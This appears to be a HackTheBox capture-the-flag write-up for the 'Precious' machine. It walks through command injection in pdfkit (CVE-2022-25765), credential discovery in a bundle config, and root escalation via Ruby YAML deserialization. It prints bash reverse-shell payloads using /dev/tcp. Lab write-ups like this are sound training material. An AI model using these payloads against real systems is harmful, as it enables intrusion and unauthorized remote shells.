HackTheBox — Precious

4 min readMay 20


Precious an easy rated linux machine which involved a site converting web pages to PDF using pdfkit which was vulnerable to command injection (CVE-2022–25765), giving us a shell as ruby user, password for henry was found through bundle config file, with henry a dependency checker script can be ran as root user which was using yaml.load vulnerable to ruby deserialization.


Nmap scan report for
Host is up (1.5s latency).
Not shown: 63496 closed tcp ports (reset), 2037 filtered tcp ports (no-response)
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 84:5e:13:a8:e3:1e:20:66:1d:23:55:50:f6:30:47:d2 (RSA)
| 256 a2:ef:7b:96:65:ce:41:61:c4:67:ee:4e:96:c7:c8:92 (ECDSA)
|_ 256 33:05:3d:cd:7a:b7:98:45:82:39:e7:ae:3c:91:a6:58 (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: Did not follow redirect to http://precious.htb/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


Visiting the web server, it redirects to precious.htb

Adding the domain in /etc/hosts file

Here we can input a url for the web page which will convert it into a pdf file, on trying http://localhost and it doesn't allow them

Trying a remote url did worked


Running exiftool on the generated pdf, we'll see the version of pdfkit

Which reveals that this version is vulnerable to command injection CVE-2022-25765

Following the commits being made on pdfkit and snyk, it needs http:// at the beginning and the with back ticks we can can include shell command


We can see the machine sending ICMP packets to our machine from here we can get a shell using bash payload

http://%20`/bin/bash -c "bash -i >& /dev/tcp/ 0>&1"`

Running pspy doesn’t show anything interesting

Privilege Escalation (henry)

Going into ruby's home directory, we can see .bundle foldder which has henry's password

Privilege Escalation (root)

Doing sudo -l we can see this user can run /opt/update_dependencies.rb file as root user

This script will read try to read dependency.yaml file and will compare yaml and pdfkit it’s version

Since it’s reading yaml, this can abused with ruby deserilization because of yaml.load, by creating a dependency.yaml file in a directory where henry has write access

On replacing the id command in the yaml file with bash reverse shell, we’ll get root shell.

/bin/bash -c 'bash -i >& /dev/tcp/ 0>&1'





Smol Pentester| OSCP | CTF Player | UwU